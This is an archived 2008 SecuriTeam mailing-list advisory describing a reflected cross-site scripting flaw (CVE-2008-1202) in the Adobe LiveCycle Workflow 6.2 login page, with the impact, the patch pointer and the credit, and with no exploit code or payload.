[NT] Adobe LiveCycle Workflow XSS Vulnerability
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 12 Mar 2008 13:56:24 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Adobe LiveCycle Workflow XSS Vulnerability
------------------------------------------------------------------------
SUMMARY
The Adobe LiveCycle Workflow management login page contains a
vulnerability which is susceptible to a cross site scripting (XSS) attack.
DETAILS
Vulnerable Systems:
* Adobe LiveCycle Workflow version 6.2 Management Web Interface
Impact:
A remote attacker could execute a XSS attack that could pass arbitrary
html to the user and capture usernames/passwords.
Technical Details:
Input passed to the URL of the web management login page is not properly
sanitized before being returned to the user. This can be exploited to
execute arbitrary HTML and script code in a user s browser session in
context of an affected site.
Fix Information:
This issue has been resolved. The patch may be obtained from:
<http://www.adobe.com/go/supportportal>
http://www.adobe.com/go/supportportal
CVE Information:
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1202>
CVE-2008-1202
ADDITIONAL INFORMATION
The information has been provided by <mailto:disclosure@xxxxxxxxxxxxxxxx>
Dave Lewis.
The original article can be found at:
<http://www.liquidmatrix.org/blog/2008/03/11/advisory-adobe-livecycle-workflow-xss-vulnerability/> http://www.liquidmatrix.org/blog/2008/03/11/advisory-adobe-livecycle-workflow-xss-vulnerability/
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [NEWS] BEA WebLogic Server Console HTML Injection
- Next by Date: [NT] Vulnerabilities in Microsoft Office Web Components Allows Code Execution (MS08-017)
- Previous by thread: [NEWS] BEA WebLogic Server Console HTML Injection
- Next by thread: [NT] Vulnerabilities in Microsoft Office Web Components Allows Code Execution (MS08-017)
- Index(es):
Relevant Pages
- [REVS] Understanding and Preventing DNS-related Attacks by Phishers
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... This paper, extending the original
material of "The Phishing Guide", ... Internet-based customers are dependent upon,
and how they can be exploited ... This paper focuses upon a recent group of attack vectors
used by criminals ... (Securiteam) - [REVS] Multiple Collisions attack on MD5 and other Hashing Algorithms
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... This collision attack might
someday introduce a weakness in MD5 ... The presented attack can find many real collisions
which are ... (Securiteam) - [UNIX] Hewlett Packard HP-UX Remote pfs_mountd.rpc Buffer Overflow Vulnerability
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Hewlett Packard HP-UX Remote pfs_mountd.rpc
Buffer Overflow Vulnerability ... the attack is functional over UDP, thus allowing
an attacker to completely ... 10/25/2004 Initial vendor notification ... (Securiteam) - [NEWS] Common DNS Misconfiguration can Lead to "same Site" Scripting
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... attack is trivial, for
example, from a shared UNIX system, an attacker ... via) a machine that hosts another website,
... configurations for domains that host websites that rely on HTTP state ... (Securiteam) - [NT] Windows 2000/2003 SYN DoS Attack Protection
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Windows 2000/2003 SYN DoS Attack
Protection ... The vulnerability resides in the hash table management, ... (Securiteam)
